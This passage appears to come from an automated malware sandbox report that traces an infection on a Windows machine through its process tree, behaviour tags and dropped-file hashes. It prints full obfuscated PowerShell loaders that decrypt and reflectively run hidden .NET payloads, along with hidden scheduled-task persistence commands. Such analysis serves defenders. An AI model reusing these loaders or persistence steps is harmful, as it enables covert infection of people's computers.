'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2280
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2600
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3024
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3108
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_282_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_282.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_282.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_282.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_282.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_282.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\New.exe"C:\Users\Admin\AppData\Local\Temp\New.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:4020 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
PID:3744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3476
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3800
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3996
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4304
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4548
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1508
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4228
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3168
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1692
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
PID:4716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55dc9a9599fb11ee70f9164d8fea15abf
SHA185faf41a206f3fa8b469609333558cf817df2cda
SHA2563f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
Filesize
17KB
MD587fa629a36efe8f3232c6ab90d724f06
SHA1d40784bcc12e3fb97ba89361fd134d497e72f869
SHA2565e6ad6240d770bcfb43f24fdf3fb744a2a76bc910632e32119f7752473d3fd52
SHA51242ae365fd2385dd5a130a5d765f847a649e60c74a78840f70bbe961155bb67fbc839776fdf2e5c6571f9aa46460a45e6f9723fdba4f46a32a0dc1d636dffb62c
-
Filesize
163KB
MD5b51552b77057c2405f73bbbf9c89234a
SHA14793adbba023f90d2d2ad0ec55199c56de815224
SHA256720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
Filesize
409KB
MD5cf570b21f42f0ce411b7c9961068931e
SHA1f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d
SHA256d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234
SHA512de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1002KB
MD5f6d5bfaee8a55ff72c7b453fda066d62
SHA17d737d53013990e5d05076b7206e43eb4793fc7f
SHA2563ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
SHA512e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284
-
Filesize
115B
MD5893f6816e0656f1828bdb7363d629828
SHA1c190617a704471de3d551ade7e681617c1a47feb
SHA256c73a511bb998786697d0b3a556e614c50eb82cd5cd51dfa8d16386286c505eb0
SHA512357d1683dae3e23b9aceb7f99914dd1ffed99d63e66c57b026c01ca1982e030acc5266a42fdb4d79ca26214f98066f6e381fab162a14065df736c3b815771ab9